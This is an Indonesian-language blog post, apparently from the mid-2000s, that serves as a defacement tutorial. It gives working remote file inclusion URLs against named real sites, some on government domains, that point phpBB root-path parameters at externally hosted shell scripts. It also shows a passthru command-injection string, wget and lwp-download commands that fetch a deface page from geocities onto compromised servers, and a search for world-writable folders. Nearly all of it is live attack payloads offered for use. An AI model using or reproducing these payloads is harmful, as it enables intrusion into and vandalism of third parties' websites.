deface phpbb/forum
http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya
jadi index.php dibuang
http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?
dikotak masukin: pwd
Kalo keluar “Hacking attempt” artinya dipath
Tapi kalo berhasil, terserah lu mau di apain……
==========================================
deface phpbb/forum II
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
itu file aslinya
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
itu bug nya
cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
cara wget nya ada 3 cara :
1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls
2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm
3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls
biasa nya cara ke 3 yg berhasil.
cara liat nya http://singapore.bluejackings.net/arai.html
=========================================
cara liat fs tanpa login
http://www.friendster.com/useropen.php?uid=
<<<<<<>
===========================================
deface php dgn injection III
langsung di tembak aja bos biar ga lama2
www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
kolo berhasil seperti biasa
cmd sql php injection
buat nyari akses ke foldernya
cmd => find / -perm 777 -type d
klo foldernya permision denied berarti kita ga bisa apa2 di folder itu
cari folder yg ga ada tulisan perm
ambil contoh ini
http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
cari akses foldernya [commndnya diatas]
cmd => find / -perm 777 -type d
bakal makan B/w
jd sabar aja
=== contoh -perm denied ==
find: /mnt/drive2/lost+found: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
itu artinya no akses
kita cari yg lain
tp usahakan foldernya yg /var/www/
klo ga ada juga gpp
ada yg lain
/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]
[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll
skarang kita wget
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html
coba lo masukin
ke cmdnya
———————————————————
–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html
=> `arai.html’
Resolving www.geocities.com… 66.218.77.68
Connecting to www.geocities.com[66.218.77.68]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6,021 [text/html]
0K ….. 100% 98.21 KB/s
10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]
———————————————————
itu artinya sukses ke save
karena httpdocs
gampang cara liatnya
/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo]
contoh www.hdca.org/downloads/arai.html
selsai deh
gampang kan
http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/
http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani
Tidak ada komentar:
Posting Komentar
Monggo..